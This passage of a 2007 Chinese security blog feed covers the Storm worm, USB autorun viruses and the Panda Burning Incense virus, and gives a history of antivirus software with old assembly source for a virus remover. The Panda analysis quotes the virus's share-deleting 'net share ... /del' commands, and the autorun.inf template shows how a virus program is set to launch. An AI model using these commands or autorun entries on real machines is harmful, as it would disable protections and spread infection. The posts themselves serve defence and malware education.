target="_blank">www.baidulink.com</a>等30几个网站也将被屏蔽,并自动发送主题为“你和谁视频的时候被拍下的?给你笑死了!”的病毒邮件,实现病毒的自动传播.<br/><br/><br/>Tags - <a href="http://www.springbbs.com/blog/tag.php?tag=%25E7%2597%2585%25E6%25AF%2592" rel="tag">病毒</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=%25E5%25AE%2589%25E5%2585%25A8" rel="tag">安全</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=%25E8%25A0%2595%25E8%2599%25AB" rel="tag">蠕虫</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=kb935423" rel="tag">kb935423</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=windows" rel="tag">windows</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=microsoft" rel="tag">microsoft</a>
]]>
</description>
</item><item>
<link>http://www.springbbs.com/blog/read.php?364</link>
<title><![CDATA[风暴蠕虫病毒席卷全球]]></title> 
<author>jeffchen88 &lt;webmaster@springbbs.com&gt;</author>
<category><![CDATA[资讯]]></category>
<pubDate>Sat, 20 Jan 2007 12:55:57 +0000</pubDate> 
<guid>http://www.springbbs.com/blog/read.php?364</guid> 
<description>
<![CDATA[ 
	<P>Finish数据安全公司F-Secure今天表示,名叫“风暴蠕虫”的计算机病毒.风暴蠕虫病毒电子邮件通常也附带以下附件:<BR>Full Clip.exe<BR>Full Story.exe<BR>Read More.exe<BR>Video.exe<BR>F-Secure告诫电子邮件用户打开邮件的时候需要谨慎，同时要安装反病毒软件.</P><P>如果考虑到电子邮件用户大批量BCC发送电子邮件,全球受“风暴蠕虫”病毒感染的电脑数量还要更高.风暴蠕虫病毒一个晚上就扩散到很大范围,这要归功于垃圾邮件帮忙传播.风暴蠕虫病毒正在全球大规模迅速扩散.风暴蠕虫病毒的实际名称是“Small.DAM”.风暴蠕虫病毒的起源目前还不清楚. </P><P>以下主题的电子邮件都有可能包含风暴蠕虫病毒:</P><P><BR>230 dead as storm batters Europe.<BR>A killer at 11, he's free at 21 and...<BR>British Muslims Genocide<BR>Naked teens attack home director.<BR>U.S. Secretary of State Condoleezza...</P><P>F-Secure表示,风暴蠕虫病毒属于木马类型,受感染的计算机将被远程控制作为“肉机”,来进行诸如“拒绝服务”等类型的攻击或者数据迁移.<BR></P><P>&nbsp;</P><br/>Tags - <a href="http://www.springbbs.com/blog/tag.php?tag=%25E7%2597%2585%25E6%25AF%2592" rel="tag">病毒</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=%25E8%25A0%2595%25E8%2599%25AB" rel="tag">蠕虫</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=%25E7%2594%25B5%25E5%25AD%2590%25E9%2582%25AE%25E4%25BB%25B6" rel="tag">电子邮件</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=%25E8%25BF%259C%25E7%25A8%258B%25E6%258E%25A7%25E5%2588%25B6" rel="tag">远程控制</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=%25E8%2582%2589%25E9%25B8%25A1" rel="tag">肉鸡</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=%25E6%258B%2592%25E7%25BB%259D%25E6%259C%258D%25E5%258A%25A1" rel="tag">拒绝服务</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=%25E6%2594%25BB%25E5%2587%25BB" rel="tag">攻击</a>
]]>
</description>
</item><item>
<link>http://www.springbbs.com/blog/read.php?357</link>
<title><![CDATA[[转载]U盘(auto病毒)类病毒分析与解决方案]]></title> 
<author>jeffchen88 &lt;webmaster@springbbs.com&gt;</author>
<category><![CDATA[资讯]]></category>
<pubDate>Fri, 12 Jan 2007 13:19:38 +0000</pubDate> 
<guid>http://www.springbbs.com/blog/read.php?357</guid> 
<description>
<![CDATA[ 
	<P><B>出处</B>:<B>数据安全实验室 (DSW Lab Avert 小组)原创</B></P><br/><P><B>U盘病毒简述:<BR></B>　　U盘(自动运行)类病毒(auto病毒)近来非常常见,并且具有一定程度危害,它的机理是依赖Windows的自动运行功能,使得我们在点击打开磁盘的时候,自动执行相关的文件.目前我们使用U盘都十分频繁,当我们享受U盘所带来的方便时,U盘病毒也在悄悄利用系统的自动运行功能肆意传播,目前流行的 U盘病毒文件大家甚至耳熟能详了,比如经常有网友问的SSS.EXE SXS.EXE如何查杀这类的,下面我们将对U盘病毒极其特性和防范办法进行分析总结. <BR><BR><B>二、特性分析:</B> </P><br/><P>　　所谓的自动运行功能是指Windows系统一种方便特性，使当光盘、U盘插入到机器自动运行，而这种特性的实现就是通过磁盘跟目录下的 autorun.inf文件进行。这个文件保存在驱动器的根目录下(一般会是一个隐藏属性的系统文件)，它保存着一些简单的命令，告知系统新插入的光盘或 U盘应该自动启动什么程序等。</P><br/><P>　　　　常见的Autorun.inf文件格式大致如下：</P><br/><P>　　　　[AutoRun]　　　　//表示AutoRun部分开始，必须输入<BR>　　　　 icon=C:C.ico　　//指定给C盘一个个性化的盘符图标C.ico<BR>　　　　 open=C:1.exe　　//指定要运行程序的路径和名称，只要在此放入病毒程序就可自动运行；</P><br/><P>　　在Windows系统有允许和阻止自动运行的键值的方法：<BR><BR>　　在注册表中找到如下键：</P><br/><P>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;键路径：[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExploer]</P><br/><P>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 在右侧窗格中有 "NoDriveTypeAutoRun"这个键决定了是否执行Autorun功能.其中每一位代表一个设备,不同设备用以下数值表示:</P><br/><P><BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 设备名称 第几位 值 设备用如下数值表示 设备名称含义 <BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; DRIVE_UNKNOWN 0 1 01h 不能识别的类型设备 <BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; DRIVE_NO_ROOT_DIR 1 0 02h 没有根目录的驱动器 <BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; DRIVE_REMOVABLE 2 1 04h 可移动驱动器 <BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; DRIVE_FIXED 3 0 08h 固定的驱动器 <BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; DRIVE_REMOTE 4 1 10h 网络驱动器 <BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; DRIVE_CDROM 5 0 20h 光驱 <BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; DRIVE_RAMDISK 6 0 40h RAM磁盘 </P><br/><P>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 其中： 保留 7 1 80h 　未指定的驱动器类型</P><br/><P>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 以上值"0"表示设备运行，"1"表示设备不运行。<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 从上面可以看出，对应的DRIVE_NO_ROOT_DIR、DRIVE_FIXED、DRIVE_CDROM、DRIVE_RAMDISK是可以自动运行的。所以要禁止硬盘自动运行AutoRun.inf文件，就必须将DRIVE_FIXED这些键的值设为1，由于DRIVE_FIXED代表固定的驱动器(即硬盘)。如果仅想禁止软件光盘的AutoRun功能，但又保留对CD音频碟的自动播放能力，这时只需将“NoDriveTypeAutoRun”的键值改为：BD,00,00,00即可。</P><br/><P>&nbsp;</P><br/><P>　　 U盘病毒就是利用这种系统特性，一般在感染后会修改系统的注册表，将显示所有文件的选项设置为禁止。甚至修改磁盘关联，杀毒软件一般会只把病毒文件清除，但对残余的文件不会处理。这也是常见的杀毒软件为什么常常无法清除干净，或者清除后双击无法打开磁盘的原因。<BR></P><br/><P><B>三、解决方案：</B></P><br/><P>　　　 1、使用超级巡警套装来全面解决U盘病毒问题(推荐!):</P><br/><BLOCKQUOTE><br/><P>①超级巡警对U盘病毒检测进行了特别的处理，可以快速的监测和定位U盘病毒，并清除它们。<BR>②超级巡警同时还提供对注册表关联修复和自动运行阻止的处理。<BR><BR>2、手动解决办法：</P><br/><P>①根据上面的原理，自己修改注册表禁止磁盘的自动运行特性。<BR>②把文件夹选项中隐藏受保护的操作系统文件钩掉，选中显示所有文件和文件夹，点击确定。这样可以在感染病毒的移动存储设备中会看到几个文件(包括autorun.inf和病毒文件)，删除后，病毒就清除了。</P></BLOCKQUOTE><br/>Tags - <a href="http://www.springbbs.com/blog/tag.php?tag=autorun" rel="tag">autorun</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=u%25E7%259B%2598" rel="tag">u盘</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=%25E7%2597%2585%25E6%25AF%2592" rel="tag">病毒</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=u%25E7%259B%2598%25E7%2597%2585%25E6%25AF%2592" rel="tag">u盘病毒</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=%25E8%2587%25AA%25E5%258A%25A8%25E8%25BF%2590%25E8%25A1%258C" rel="tag">自动运行</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=%25E6%25B8%2585%25E9%2599%25A4%25E6%2596%25B9%25E6%25B3%2595" rel="tag">清除方法</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=%25E8%25A7%25A3%25E5%2586%25B3%25E6%2596%25B9%25E6%25A1%2588" rel="tag">解决方案</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=%25E5%25AE%2589%25E5%2585%25A8" rel="tag">安全</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=antivirus" rel="tag">antivirus</a>
]]>
</description>
</item><item>
<link>http://www.springbbs.com/blog/read.php?353</link>
<title><![CDATA[[转载]熊猫烧香病毒专题:多少变种,怎么破坏,如何查杀?]]></title> 
<author>jeffchen88 &lt;webmaster@springbbs.com&gt;</author>
<category><![CDATA[资讯]]></category>
<pubDate>Tue, 02 Jan 2007 17:11:15 +0000</pubDate> 
<guid>http://www.springbbs.com/blog/read.php?353</guid> 
<description>
<![CDATA[ 
	<P><B>这个幽默又具有破坏力的病毒恐怕最近中招的不少,来看看这篇技术分析:<BR>一、熊猫烧香有几个变种？</B><BR>到目前为止,从大体上分,目前主要有四大变种,变种A我们已经分析,见本版,变种B的就是大家常说的spoclsv.exe进程,它藏的全路径是:% SystemRoot%/Driversspoclsv.exe,其它部分与变种A基本一致.<BR><BR>变种C主要的改动是对抗杀毒软件，尤其是超级巡警的专杀，该专杀旧版本被360安全卫士内置到工具列表中。变种C通过查找窗口标题有超级巡警字样，即关闭该窗口，即使在桌面新建一个名为超级巡警的文本文件，用记事本打开也会被关闭。因此许多网友下载了旧版的专杀，抱怨打开就被关闭。<BR><BR>同时熊猫烧香病毒还会关闭其它一些常见的进程管理的，比如常用的Windows任务管理器。对付这种变种的方法就是使用一个不被关闭的进程管理的，推荐使用X-PS，下载地址和使用说明：<A href="http://www.unnoo.com/html/research/2006/0718/29.html" target=_blank><U><FONT color=#0000ff><a href="http://www.unnoo.com/html/research/2006/0718/29.html" target="_blank">http://www.unnoo.com/html/research/2006/0718/29.html</a></FONT></U></A>，关闭掉名为spoclsv.exe的进程。然后在使用巡警的专杀，当然也可以下载最新的超级巡警使用里面的专杀来查杀。<BR>变种D是最近才出现的一个变种，该变种感染文件后图标不在是熊猫模样，当感染该变种会在临时目录发现100个图标文件。还有其它一些变种，基本都是为了躲避查杀进行修改和下载不同的后门的版本。</P><br/><P><BR><B><BR>二、对系统的破坏：<BR></B><BR>熊猫烧香在感染的系统上，会关闭杀毒软件进程，删除杀毒软件的注册表项目，禁用杀毒软件的服务，修改资源管理器不显示隐藏文件等。<BR><BR>还会调用如下命令来删除共享：<BR>cmd.exe /c net share C$ /del /y<BR>cmd.exe /c net share D$ /del /y<BR>cmd.exe /c net share admin$ /del /y<BR>....<BR><BR>旧变种会全面感染系统文件，新变种会感染除系统目录外的文件，即尽量不感染<a href="http://www.microsoft.com" target="_blank" title="http://www.microsoft.com" class="mykeyword">微软</a>操作系统自身的文件。<BR><BR>新旧变种都会删除.gho，一般人会在安装完成系统后，使用Norton Ghost进行备份，熊猫会恶意删除这个备份文件。<BR><BR>其中一个变种还会在感染目录生成desktop_.ini。<BR><BR>最大的破坏是，熊猫烧香本身就是一种下载者，会在指定的网站下载后门、木马、各种盗号程序，甚至DDoS程序。<BR><BR><B>三、为什么无法清除干净，如何彻底查杀：</B><BR><BR>有人使用了超级巡警和巡警之熊猫专杀后，将一个机子杀干净了，但不久又发现感染了，这是因为，熊猫烧香在感染了一个系统后，开启一个单独的线程进行C类网络扫描感染，访问同网段的139/445端口，进行IPC$密码猜解和查找共享，并感染共享中的文件。这样只要网络内有一个机子还有存活的熊猫烧香病毒，就依然存在再次感染全网的可能。<BR><BR>许多朋友网络内都是有文件共享服务器，电影服务器，而许多网友的网络内的人都为了方便系统登录口令都是空口令，或者是123这样的简单口令。<BR><BR>局域网中有个IE没有打病毒，浏览挂了熊猫烧香病毒的网站，并不知情。<BR><BR>查杀的办法是：<BR><BR>1、断开网络，使用超级巡警之熊猫烧香专杀，每个机子全面杀毒。<BR>2、修改口令，取消本地共享目录。<BR>3、查杀完成后使用超级巡警的补丁检查检查系统没有打的补丁，及时打上补丁，尤其是IE补丁。<BR><BR>最新版巡警已经内置了最新专杀，请到官方网站<A href="http://dswlab.com/" target=_blank><U><FONT color=#0000ff><a href="http://dswlab.com" target="_blank">http://dswlab.com</a></FONT></U></A>中推荐的下载地址去下载!<BR></P><br/>Tags - <a href="http://www.springbbs.com/blog/tag.php?tag=virus" rel="tag">virus</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=%25E7%2597%2585%25E6%25AF%2592" rel="tag">病毒</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=%25E7%25A0%25B4%25E5%259D%258F" rel="tag">破坏</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=%25E6%2581%25B6%25E6%2584%258F%25E7%25A8%258B%25E5%25BA%258F" rel="tag">恶意程序</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=%25E7%2586%258A%25E7%258C%25AB%25E7%2583%25A7%25E9%25A6%2599" rel="tag">熊猫烧香</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=%25E6%259D%2580%25E6%25AF%2592%25E8%25BD%25AF%25E4%25BB%25B6" rel="tag">杀毒软件</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=antivirus" rel="tag">antivirus</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=%25E5%258F%2598%25E7%25A7%258D" rel="tag">变种</a>
]]>
</description>
</item><item>
<link>http://www.springbbs.com/blog/read.php?352</link>
<title><![CDATA[[转载]反病毒理念、历史、现状与未来]]></title> 
<author>jeffchen88 &lt;webmaster@springbbs.com&gt;</author>
<category><![CDATA[资讯]]></category>
<pubDate>Mon, 01 Jan 2007 14:54:35 +0000</pubDate> 
<guid>http://www.springbbs.com/blog/read.php?352</guid> 
<description>
<![CDATA[ 
	今天,似乎没有多少人对反病毒产品的未来进行探索.F-Prot已经不像当年那么风光无限,虽然它的启发扫描的逻辑依然被我所赞叹.卡巴斯基 (Kaspersky)“独孤求败”的寂寞和不能出世的无奈并不为多少外人所知.然而市场毕竟是市场,用户并不关心你的启发扫描模块的优劣.据我所知,有几个厂商的反病毒引擎,已经近4年几乎没有更新过,这些年惟一更新的就是不断的炒作.有的“要求进步”的公司则直接建立了研究室,你别以为这是独立探索最新反病毒技术的地方,事实上这是逆向先进反病毒产品,从而用来亦步亦趋的跟着学的研究室.<BR><BR>每天都是一个变革的开始,给新生的力量带来了机会,Microsoft也正式的介入了这个领域,事实上在遥远的DOS年代Microsoft就染指了一次反病毒市场,那是个时候正好是免疫技术流行的时代,Microsoft错误的以为免疫技术足以应对各种病毒,于是CPAV一度在DOS下流传.然而天山派剑术的轻灵终究无法抵挡昆仑派内力的雄厚,所以Microsoft败得很惨.但Microsoft又是一个善于学习的商家,今天Anti- Spyware 、Windows OneCare 、Windows Defender 卷土重来,一波波态势逼人.<BR><BR>而传闻中MS Anti-Spyware某次升级后会不小心删除Norton Antivirus,这是不是又预示一场不公平的竞争开始.<BR><BR>未来在那里,谁又能看的清呢,于是笔者killer只好寻根一下历史,企图借历史一双慧眼去先知一下未来.现在看来,有所惑有所不惑,把酒夜话,一切尽在不言中.<BR><BR>作者：killer②xfocus.org<A href="http://www.dswlab.com/"></A><BR>大成天下主页：<A href="http://www.unnoo.com/"><U><FONT color=#800080><a href="http://www.unnoo.com" target="_blank">http://www.unnoo.com</a></FONT></U></A><BR>作者和他所在的团队2006年开始组建数据安全实验室，一年来，该团队开发的超级巡警受到广大网管、网民的喜爱。在各大下载站点普遍处于反病毒、反木马软件下载量前五名。2006年底DSWLAB团队开发的<A href="http://www.secyou.cn/bbs/forumdisplay.php?fid=10" target=blank><U><FONT color=#800080>熊猫烧香专杀工具</FONT></U></A>，有效地帮助了大量受该肆虐病毒影响的用户，2007年，超级巡警将会更好地发力，敬请期待 <IMG title=按此在新窗口打开图片 alt="" src="http://www.i170.com/htmledit/editor/images/smiley/msn/ext_11.gif" border=0><BR><BR><B>一、玩的就是概念</B><BR>AV是我习惯的简写，全名应该叫Anti-Virus，从这个英语字面含义和一些对反病毒历史的追溯，我发现最初人们想表现的并不是杀毒，今天我们总是习惯叫杀毒软件，其实是不准确的。Anti的本意是抵制、防护，它应该叫抗病毒，或者防病毒。不论抗或者防都说明对病毒的未雨绸缪。杀毒则是一种后发补救的策略，虽说亡羊补牢犹未晚，但毕竟还是有一些损失的。<BR>叫杀毒软件则是典型的中国特色，比如健康，中国人一般平时是不太注意健康的，等到有病了才要去看病。中国的反病毒公司出于宣传效果需要，就必然要搞的威风凛凛，给AV技术带来一层杀气腾腾的神秘色彩。<BR>说起概念，我很欣赏一些国外的宣传，这里不防就给NAV做个广告：<BR><br/><DIV align=center><IMG title=按此在新窗口打开图片 height=333 alt="" src="http://www.i170.com/Attach/7F60087B-9AAF-4E60-8869-C9711654AB5E" width=220 border=0> <BR></DIV><BR>看到没，上面这图就是Symentec给自己做的宣传页，诺顿在发布会上用瑜伽诠释了它的文化自由分享，安心沟通，瑜伽的充分舒展身体，意味着自由，意味着无限延伸。<BR>如今的网络你可以安心沟通么？显然不能!网络上广告满天飞，流氓插件群魔乱舞，垃圾邮件像一只只马蜂乱蛰，一些黑客整天无聊的扫来扫去，D站 D得不亦乐乎。这个时候，你认为你需要的，显然不是浪费时间和精力的去检查，去杀灭，你希望的也许是一个安心的防护套件，让我们可以自由、安心的冲浪。<BR>反病毒理念的不同造就各种不同的反病毒产品，不过上天有好生之德，本文作者亦本着万物以自己的喜好为准，所以并不特别推荐你用哪种AV，也请勿问我。<BR><BR><B>二、混沌初开</B><BR>自从盘古开天辟地的以来，出来了两个神仙级的人物，一个被人称为Doctor Soloman，一个叫Eugene Kaspersky，另外还有两个叫Peter Norton和Mcafee。这几位神仙有感人间妖风阵阵^-^，病毒横行。决定制定一套法典，用来解救世人，于是他们的研究，促成了当年反病毒理论的基础。这些基础理论，经过后来的一些教授、专家们推广开来，就形成了今天的反病毒体系。<BR>在那个时代，还有无数的高人，自己苦心孤诣的修炼，但终因天资所限、时不与我，或者剑走偏锋，步步险招，无法修炼成正果。<BR>远古的反病毒软件主要有：<BR><br/><BLOCKQUOTE>Anti-virus collection by V.Bontchev<BR>F-Prot<BR>File Shiled by McAfee<BR>NOD of Slovak AV<BR>TbScan<BR>AVP by E.Kaspersky<BR>Dr.Web by Igor Daniloff<BR>Norton AV<BR>Solomon's Toolkit<BR>LEVEL3 virus dedicated AV by SAC<BR>IBM Anti-Virus <BR></BLOCKQUOTE>除了这些，还有更多的针对某个病毒的专杀，这里就不一一列出了。值得注意的是：我在这里尽量列出今天你还能熟知的名字，然而尽管我努力，历史终究是无情的。你在上面看到的，一部分和大多数我没列出来的已经成为遥远的过去，只有像我这样喜欢怀旧的人，偶尔会想起那些曾经的同病毒决战的侠士。 <BR>最初病毒不多，能掌握写病毒会被人视为天才，好像现在还是这样？大家的抗病毒办法都是针对一个个病毒写专杀，后来因为病毒多了，大家开始编写类似批处理的脚本，这样用户在选择1 2 3 菜单来选择查杀哪个病毒，这本质还是一对一的检测方式。<BR>还有多少朋友记得DOS中那个编制菜单用来选择的命令？ <BR>早期的AV几乎都是这样过来的，但是随后神仙们发现这样做不行，病毒数量膨胀的太快，文件格式具备通用处理过程，每次的专杀都有一些重复工作的地方。所以神仙们的反病毒理论逐渐浮出水面，这个时候，开始形成了通用反病毒技术。整个的针对大量的病毒的处理，也开始了模块化分工，扫描/清除，文件修复等。<BR>于是AV开始转型，具备扫描模块、清除模块、特征库，AV外围技术也开始如火如荼的发展起来，主动监控、完整性检查、免疫技术等等。<BR>下面这一段就是最初一个完整的用来清除引导病毒的AV源代码：<BR><br/><BLOCKQUOTE>=====================================================================<BR>.model tiny<BR>.radix 16<BR>.code<BR>org 100<BR>start:<BR>mov dx,offset message<BR>mov ah,09<BR>int 21<BR>xor ax,ax<BR>int 16<BR>or al,20<BR>cmp al,'y'<BR>je Goforit<BR>mov dx,offset notdone<BR>mov ah,09<BR>int 21<BR>mov ax,4c01<BR>int 21<BR>GoForIt:<BR>xor ax,ax<BR>mov ds,ax<BR>mov ax,word ptr ds:[413]<BR>mov cs:ConvMEM,ax <BR>mov di,offset Int13<BR>mov si,13*4<BR>movsw<BR>movsw<BR>push cs<BR>pop ds<BR>cmp ConvMem,280<BR>je RegConvMem<BR>mov ah,09<BR>mov dx,offset StrangeConv<BR>int 21<BR>RegCOnvMem:<BR>mov ax,0201<BR>mov bx,offset OrgSector<BR>mov cx,1<BR>mov dx,80<BR>int 13<BR>call TunnelInterrupts<BR>mov ax,0201<BR>mov bx,offset NewSec<BR>mov cx,1<BR>mov dx,80<BR>int 13<BR>push cs cs<BR>pop es ds<BR>mov di,offset NewSec<BR>mov si,offset OrgSector<BR>mov cx,200<BR>repz cmpsb<BR>jcxz NoDifference<BR>mov ax,0301<BR>mov bx,offset OrgSector<BR>mov cx,1<BR>mov dx,80<BR>int 13<BR>mov ah,3c<BR>mov dx,offset sample<BR>xor cx,cx<BR>int 21<BR>xchg bx,ax<BR>mov ah,40<BR>mov dx,offset NewSec<BR>mov cx,200<BR>int 21<BR>mov ah,3e<BR>int 21<BR>LOCKEMIN:<BR>cli<BR>mov ah,09<BR>mov dx,offset fixed<BR>int 21<BR>xor ax,ax<BR>int 16<BR>jmp LOCKEMIN<BR>Nodifference:<BR>mov ah,09<BR>mov dx,offset noprob<BR>int 21<BR>mov ax,4c00<BR>int 21<BR>TunnelInterrupts:<BR>push ax bx cx dx es ds si di<BR>xor ax,ax<BR>mov ds,ax<BR>push word ptr ds:[04]<BR>push word ptr ds:[06]<BR>cli<BR>mov word ptr ds:[04],offset Int1<BR>mov word ptr ds:[06],cs<BR>pushf<BR>pushf<BR>pop ax<BR>or ax,100<BR>push ax<BR>popf<BR>xor ax,ax<BR>call dword ptr cs:[int13] ;tunnel interrupt 13<BR>pushf<BR>pop ax<BR>and ax,0feff<BR>push ax<BR>popf<BR>ExitTunnel:<BR>les bx,dword ptr cs:[Root13]<BR>cli<BR>xor ax,ax<BR>mov ds,ax<BR>pop word ptr ds:[06]<BR>pop word ptr ds:[04]<BR>mov word ptr ds:[13*4],bx<BR>mov word ptr ds:[13*4+2],es<BR>sti<BR>pop di si ds es dx cx bx ax<BR>ret<BR>Int1:<BR>cmp cs:found,1<BR>je exitint1<BR>push bp<BR>mov bp,sp<BR>push ax bx cx dx es ds si di<BR>mov ax,ss:[bp+2]<BR>mov cx,4<BR>shr ax,cl<BR>add ax,ss:[bp+4]<BR>cmp ax,0c000<BR>jb DoneInt1<BR>mov cs:found,1<BR>les bx,SS:[bp+2]<BR>mov word ptr cs:[Root13],bx<BR>mov word ptr cs:[Root13+2],es<BR>DoneInt1:<BR>pop di si ds es dx cx bx ax bp<BR>exitint1:<BR>iret<BR>StrangeConv db 0a,0dh,'Conventional Memory Suspicious.',0a,0dh,24<BR>Fixed db 0a,0dh,'Virus Cleaned - sample saved in VIRUS.MBR .',0a,0dh <BR>db 'Now COLD REBOOT IMMEDIATELY!!!!!!!!!!!!!!!!',0a,0dh,24<BR>NoProb db 0a,0dh,'No Stealthing Detected. No Action Taken.',0a,0dh,24<BR>notdone db 0a,0dh,'No Action Taken.',0a,0dh,24<BR>Message:<BR>db 0a,0dh<BR>db '--==[Stormbringer''s Instant Stealth MBR Virus Remover.]==--',0a,0dh<BR>db ' USE AT YOUR OWN RISK! RTFM Before Using! ',0a,0dh<BR>db 0a,0dh,'Continue (y/N)',24<BR>sample db 'Virus.MBR',0<BR>found db 0<BR>NewSec db 200 dup(?)<BR>OrgSector db 200 dup(?)<BR>Int13 dd ?<BR>Root13 dd ?<BR>ConvMem dw ?<BR>end start<BR>====================================================================== <BR></BLOCKQUOTE>此时的反病毒程序，基本都是采用汇编编写。我们通过更多早期的反病毒程序源代码可以看出这个事实：抗病毒软件基本都使用纯汇编语言编写。而一个建立在理论体系化上面的完整杀毒程序代码量都不会少，这使得进入反病毒这个领域的门栏高得让人望而生畏。后来，使用纯C和C++编写的反病毒程序和相关模块多了起来，其中一部分还是基于跨平台的考虑。而在整个AV历史中，只有极少的爱好者使用Pascal语言来编写反病毒程序。<BR>这是某AV查壳部分源代码：<BR><br/><BLOCKQUOTE>======================================================================<BR>unp proc<BR>call readTitle<BR>jc noUnp<BR>cmp varNP,0<BR>je noUnp<BR>call scanPack<BR>noUnp:<BR>ret<BR>endp<BR>scanPack proc<BR>push ax bx cx dx bp di es<BR>mov es,baseSeg<BR>mov di,regIP<BR>lea si,sigUnp<BR>noLastSig:<BR>push si<BR>scanMore:<BR>call scanChSumB ;1<BR>jne nextSig<BR>......<BR>====================================================================== <BR></BLOCKQUOTE>还有一些扫描和清除模块的源代码，限于篇幅，就不一一贴出了。 <BR>远古的病毒库也较为简单，别惊讶，下面这几行，就是当年的大名鼎鼎的F-PORT的病毒特征库中的一小段：<BR><br/><BLOCKQUOTE>======================================================================<BR>Valert y0Jny5dM+OMjnm-2mljm7hpsUBQrVAqq5M6i05mO0m+4gBqYUlBNBU<BR>Taiwan OVn5aMFMA6-KNMqpYCbw-qCOqWQBEPDX553mpwNRvlehJgNldYp6Bz<BR>Durban fEJn-jPjD2m5mjIrJb8oKcVZJMgmhkBcjcaOMnjj3YnYjvuDtW<BR>Pretoria G7kmu5s5rypVosPPtvczLY7fKUc5MjucEPYkkM7F0od24-HW<BR>XA1 g0knPMSjgjKH5mj5PhOA4gK6l7jr8KJWYhOKw3mm8KgCHYMM-W<BR>Kennedy h0ljSMDMd864oME5TM+YjgeKpLuHbjmjah0fuOTM0ptAfu6LZI<BR>8-tunes jp1TKjd5htmjnMZcwNwj+THd70MrOFFKM4X55TjjURT5JMBsnv<BR>Virdem NWk5s5Ij9osXSctXAX82MMnmm674Rtw09rkRDu7e9fTlbO479rNbvdIipT<BR>======================================================================<BR></BLOCKQUOTE>后来，时代要求科学合理的病毒库出现，病毒库不单包括病毒名、特征码，还要包括清除方法。于是人们改进了原来病毒库的结构，如下就是后来许多人采用的改进病毒库结构：<BR><br/><BLOCKQUOTE>====================================================================== <BR>.!.:rc393,[VD/SLAM]<BR>.:0.:16.:66.:00.:0C 4F8E 0D9A.:3E.:0C.:20 BC46 CF5D.:AUTO+.:62.:0.:AUTO<BR>.!.:rc393,[VD/SLAM]<BR>.:0.:16.:E9.:00.:0C 2A7F 96BF.:DD.:0C.:20 48A4 2DBD.:AUTO+.:152.:0.:AUTO<BR>====================================================================== <BR></BLOCKQUOTE><BR><B>三、开元盛世</B><BR>从1994年起，AV正式成熟起来，此时的AV正慢慢走入了鼎盛时代，这个时候，以AVP为首的反病毒厂商开始大刀阔斧的占领市场，反病毒从最初的谁行谁上，演变为需要靠广告战，价格战来抢夺市场。市场的竞争就难免豪夺巧取，于是在欧洲强胜一时的Dr.Solomon开始走下坡路，最终无奈被 NAI(MCAFEE)收购。<BR>更多后起之秀们，从前辈那学来的知识，也开始参与了市场激烈的竞争，只是在反病毒技术和体系上，再也没有突破过AVP和Dr.Solomon的厂商。由于Dr.Solomon被MCAFEE收购，所以天下的反病毒引擎分为了两个派系，一个AVP(Kaspersky Antivirus)派系，一个NAI派系(Dr.Solomon派)。 <BR>而只有Eugene Kaspersky此时正式开创了一个反病毒的神话(见本人AVP神话一文)，其它的商家无一不搅在市场的这个利益的角斗场。在地下病毒站，VXER们讨论和剖析的反病毒产品主要有：AVP、TBAV、F-Prot、Dr.Web，说起这个不外乎有这样的意义，我们把目光放得更远，抛却商业的争夺看到的是，在病毒作者心目中反病毒产品的力量。事实上AVP和F-PROT以大量的病毒样本库闻名，地下的VXER经常使用这两款杀毒软件来进行样本交换。<BR>这里，让我们怀念一下Dr.Solomon，这位反病毒历史上极其重要的人物，他在1989年的反病毒产品图片(来之不易啊)：<BR><BR><br/><DIV align=center><a href="http://www.springbbs.com/blog/attachment/200701/1167663632_0.jpg" target="_blank"><img src="http://www.springbbs.com/blog/attachment/200701/1167663632_0.jpg" class="insertimage" alt="点击在新窗口中浏览此图片" title="点击在新窗口中浏览此图片" border="0"/></a></DIV><br/><DIV align=center><BR><a href="http://www.springbbs.com/blog/attachment/200701/1167663632_1.jpg" target="_blank"><img src="http://www.springbbs.com/blog/attachment/200701/1167663632_1.jpg" class="insertimage" alt="点击在新窗口中浏览此图片" title="点击在新窗口中浏览此图片" border="0"/></a></DIV><BR><br/><DIV align=center><BR></DIV>后来的For Windows 3.x Win NT 3.X 的：<BR><BR><br/><DIV align=center><a href="http://www.springbbs.com/blog/attachment/200701/1167663632_2.jpg" target="_blank"><img 